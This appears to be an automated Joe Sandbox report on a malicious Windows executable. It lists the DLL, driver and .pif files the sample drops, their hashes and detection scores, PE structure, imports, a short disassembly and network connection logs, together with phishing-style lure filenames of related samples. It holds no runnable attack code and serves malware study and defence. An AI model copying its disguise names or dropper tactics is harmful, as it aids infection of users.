Joe Sandbox View:	Filename: nWiLCvdU0P.exe, Detection: malicious, Browse Filename: Dwx4h2MQ2s.exe, Detection: malicious, Browse Filename: SOA_P990T341_JAN_2024.bat, Detection: malicious, Browse Filename: rRefN____CMS-221747.bat, Detection: malicious, Browse Filename: SWIFT_MESSAGE.bat, Detection: malicious, Browse Filename: Ihfxvzhuopygpt.exe, Detection: malicious, Browse Filename: Purchase Order.exe, Detection: malicious, Browse Filename: RFQ 11700.exe, Detection: malicious, Browse Filename: DocumentsDOC03029314B76858448A444B4C03EEC7E6F.bat, Detection: malicious, Browse Filename: Swift_Advice.bat.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................

C:\Users\Public\Libraries\netutils.dll

Download File

Process:	C:\Users\user\Desktop\qDKTsL1y44.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	117430
Entropy (8bit):	5.039733311717682
Encrypted:	false
SSDEEP:	1536:M8ypRiBID3TfyIIXt/9msamG+A5j/oSnKAf0H1Cl7MbiRUiRdI8a9pFpF:M8ypRiK/S/9zG++7nKAf0HfiRdI8khF
MD5:	96B99E2A886D816C1B98B018ADFE6311
SHA1:	41F2F29BD8F366781ED1387068150EB2789DBBF8
SHA-256:	C300A049564EEF6D8BAA136858F1F6F0779003BD1B566D95689883C6935E2BA6
SHA-512:	6768632B586123B4B7C452C05B871A2474214A5D7DB4A048F7B67BC2CDA9DBF87C2EFAF18BED86666DC145F948A2EDBE3B01949FB75E6A68D813CD18A62BA45A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Joe Sandbox View:	Filename: nWiLCvdU0P.exe, Detection: malicious, Browse Filename: Dwx4h2MQ2s.exe, Detection: malicious, Browse Filename: WFRlr0p5IH.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, Detection: malicious, Browse Filename: Bjrfyyjj.exe, Detection: malicious, Browse Filename: PCMNil7wkU.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.DropperX-gen.28581.15702.exe, Detection: malicious, Browse Filename: SCAN_DSC0027929829.PDF..exe, Detection: malicious, Browse Filename: DF0987890000.scr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........\......... ..... ...$................<a............................. ................ ..............................................................P..................\........................... ...(................................................................... .................. .P`.............0.......*..............@.p..............@.......2..............@.P@.............P.......8..............@.0@.............`.......<..............@.0@.............p........................p......................>..............@.0@.....................@..............@.0.........X............H..............@.@.........h............J..............@.`.........\............L..............@.0B/4...................N..............@.PB/19..................R..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....

C:\Users\Public\Libraries\truesight.sys

Download File

Process:	C:\Users\user\Desktop\qDKTsL1y44.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	53696
Entropy (8bit):	6.830243356027624
Encrypted:	false
SSDEEP:	768:58GYJAAcoglJBtzCMSS4cTl9zIG3Hzuaq1ocezTBk4/HvAMxkExHs1R9zZ1SP8P:xKAAhYJz53WloceBkGHvxxIzzSPG
MD5:	F53FA44C7B591A2BE105344790543369
SHA1:	363068731E87BCEE19AD5CB802E14F9248465D31
SHA-256:	BFC2EF3B404294FE2FA05A8B71C7F786B58519175B7202A69FE30F45E607FF1C
SHA-512:	55B7B7CDA3729598F0EA47C5C67761C2A6B3DC72189C5324F334BDF19BEF6CE83218C41659BA2BC4783DAA8B35A4F1D4F93EF33F667F4880258CD835A10724D9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...rp..rp..rp..)...vp..)...wp..)...qp..rp..$p..)...up......\|p......sp......sp..Richrp..................PE..d...}..d.........."......X..."......p..........@...........................................A................................................\...(............p..D....~...S......l...@I..8............................I...............@..X............................text....-.......................... ..h.rdata.......@.......2..............@..H.data... ....`.......D..............@....pdata..D....p.......H..............@..HPAGE.................N.............. ..`INIT.................l.............. ..b.rsrc................x..............@..B.reloc..l............\|..............@..B........................................................................................................................................................................................

C:\Users\Public\Libraries\veaiqniF.pif

Download File

Process:	C:\Users\user\Desktop\qDKTsL1y44.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	175800
Entropy (8bit):	6.631791793070417
Encrypted:	false
SSDEEP:	3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
MD5:	22331ABCC9472CC9DC6F37FAF333AA2C
SHA1:	2A001C30BA79A19CEAF6A09C3567C70311760AA4
SHA-256:	BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
SHA-512:	C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............\|..8...,...@...@..@

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.567222542176421
TrID:	Win32 Executable (generic) a (10002005/4) 99.81% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	qDKTsL1y44.exe
File size:	2'088'448 bytes
MD5:	42f93ef4ac4943f328a1518bde3c333a
SHA1:	7bca2b97fe0136a6787a1f08903e723a7b2a17c1
SHA256:	60e73c48b9559b07ba1aee9fe48e0185a2686e5b88407c590f60535ff36f85db
SHA512:	f3ebb6f511d27724b69d6495bf07c7ad39bddf4c4eb3611b986faf89920e84f5e4ccf709ec4d9797a2d4976f3694163afaeae61a24174cde54d8f33fc44487fb
SSDEEP:	49152:Tv5bdj3QfVJ9zq23znSFZyeyTDLudOybI:Tv5Rj30VjSnye4eOH
TLSH:	43A5E13AED8346BEC03725B9477353E8A93E2F31FD54D4A626902DB46F7C08D6427682
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	9496969696898953

Static PE Info

General

Entrypoint:	0x46c748
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	c1225307ef24f914c7a8882eec046afb

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0046AECCh
call 00007FB8B0777B99h
mov eax, dword ptr [005E4B78h]
mov eax, dword ptr [eax]
call 00007FB8B07CA4F9h
mov ecx, dword ptr [005E4C78h]
mov eax, dword ptr [005E4B78h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0046A980h]
call 00007FB8B07CA4F9h
mov eax, dword ptr [005E4B78h]
mov eax, dword ptr [eax]
call 00007FB8B07CA56Dh
call 00007FB8B0775A08h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1e9000	0x2a4c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1f6000	0x11200	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1ee000	0x7140	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1ed000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1e97f4	0x68c	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6a0cc	0x6a200	eeedffb624154eabef831b36023ebcf1	False	0.5259289421378092	data	6.532577898390433	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x6c000	0x790	0x800	2ca692cd41dabaf1bf0a66d9b95ced2e	False	0.609375	data	6.0818258754024965	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x6d000	0x177d18	0x177e00	e39540676c83245ed457bb02e63022bb	False	0.7699859182740273	data	7.599782066061116	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x1e5000	0x3a70	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x1e9000	0x2a4c	0x2c00	fe74e44a0f0bdfabab4435d69a5fb56d	False	0.3075284090909091	data	5.08456461499419	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x1ec000	0x34	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x1ed000	0x18	0x200	26cb50fa279783f3d3e80c312cb91870	False	0.05078125	data	0.2108262677871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1ee000	0x7140	0x7200	f8c4ea6da79464b2da506e47ee96118b	False	0.6161595394736842	data	6.670022137192809	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x1f6000	0x11200	0x11200	76ffb9fe3c37b22ec28d640cbe717b67	False	0.32602931113138683	data	5.744730086699006	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x1f6770	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x1f68a4	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x1f69d8	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x1f6b0c	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x1f6c40	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x1f6d74	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x1f6ea8	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_ICON	0x1f6fdc	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 3779 x 3779 px/m			0.5045081967213115
RT_ICON	0x1f7964	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m			0.47115384615384615
RT_ICON	0x1f8a0c	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m			0.31012014787430686
RT_ICON	0x1fde94	0x67e8	Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 3779 x 3779 px/m			0.3042105263157895
RT_STRING	0x20467c	0x3fc	data			0.4
RT_STRING	0x204a78	0xa8	data			0.7202380952380952
RT_STRING	0x204b20	0x15c	data			0.5545977011494253
RT_STRING	0x204c7c	0x470	data			0.39348591549295775
RT_STRING	0x2050ec	0x380	data			0.38504464285714285
RT_STRING	0x20546c	0x3a8	data			0.39316239316239315
RT_STRING	0x205814	0x3e0	data			0.34576612903225806
RT_STRING	0x205bf4	0x214	data			0.49624060150375937
RT_STRING	0x205e08	0xcc	data			0.6274509803921569
RT_STRING	0x205ed4	0x194	data			0.5643564356435643
RT_STRING	0x206068	0x3c4	data			0.3288381742738589
RT_STRING	0x20642c	0x338	data			0.42961165048543687
RT_STRING	0x206764	0x294	data			0.42424242424242425
RT_RCDATA	0x2069f8	0x10	data			1.5
RT_RCDATA	0x206a08	0x274	data			0.7468152866242038
RT_RCDATA	0x206c7c	0x2cf	Delphi compiled form 'TForm1'			0.6050069541029207
RT_GROUP_CURSOR	0x206f4c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x206f60	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x206f74	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x206f88	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x206f9c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x206fb0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x206fc4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x206fd8	0x3e	data			0.8870967741935484

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, ValidateRect, UpdateWindow, UnregisterClassA, UnionRect, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursor, SetClipboardData, SetClassLongA, SetCaretPos, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindowEx, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCaretPos, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumClipboardFormats, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DestroyCaret, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CreateCaret, CloseClipboard, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWindowExtEx, SetWinMetaFileBits, SetViewportOrgEx, SetViewportExtEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PolyPolyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExtTextOutA, ExtCreatePen, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalLock, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
oleaut32.dll	GetErrorInfo, SysFreeString
ole32.dll	CoUninitialize, CoInitialize
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll	_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
kernel32.dll	MulDiv
uRL	FileProtocolHandlerA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 8, 2024 15:21:05.052009106 CET	49705	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:05.052046061 CET	443	49705	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:05.052212000 CET	49705	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:05.053911924 CET	49705	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:05.053983927 CET	443	49705	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:05.054455996 CET	49705	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:05.091681957 CET	49706	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:05.091717005 CET	443	49706	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:05.091789007 CET	49706	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:05.095952034 CET	49706	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:05.095968008 CET	443	49706	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:05.478470087 CET	443	49706	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:05.478754997 CET	49706	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:05.484378099 CET	49706	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:05.484400034 CET	443	49706	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:05.484867096 CET	443	49706	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:05.530570030 CET	49706	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:05.558711052 CET	49706	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:05.605907917 CET	443	49706	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:05.988751888 CET	443	49706	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:05.988850117 CET	443	49706	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:05.989252090 CET	49706	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:05.991014004 CET	49706	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:05.991034031 CET	443	49706	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:17.163103104 CET	49708	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:17.163142920 CET	443	49708	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:17.163217068 CET	49708	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:17.165405989 CET	49708	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:17.165419102 CET	443	49708	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:17.386737108 CET	443	49708	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:17.438003063 CET	49708	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:17.473443031 CET	49708	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:17.473468065 CET	443	49708	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:17.479315996 CET	49708	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:17.479321957 CET	443	49708	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:17.480423927 CET	443	49708	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:17.480490923 CET	49708	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:18.116017103 CET	49708	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:18.116219997 CET	443	49708	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:18.170715094 CET	49708	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:18.170736074 CET	443	49708	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:18.196227074 CET	49708	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:18.237919092 CET	443	49708	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:18.326817989 CET	443	49708	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:18.326917887 CET	443	49708	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:18.326968908 CET	49708	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:18.361540079 CET	49708	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:18.361572027 CET	443	49708	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:18.361588955 CET	49708	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:18.361596107 CET	443	49708	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:20.843019009 CET	49709	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:20.843048096 CET	443	49709	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:20.843141079 CET	49709	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:20.846348047 CET	49709	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:20.846363068 CET	443	49709	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:21.209994078 CET	443	49709	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:21.214183092 CET	49709	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:21.214196920 CET	443	49709	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:21.214795113 CET	49709	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:21.214802980 CET	443	49709	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:21.215961933 CET	443	49709	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:21.216026068 CET	49709	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:21.259536982 CET	49709	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:21.259708881 CET	443	49709	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:21.262176991 CET	49709	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:21.262191057 CET	443	49709	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:21.377394915 CET	443	49709	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:21.377473116 CET	49709	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:21.377896070 CET	49709	443	192.168.2.8	54.145.184.72
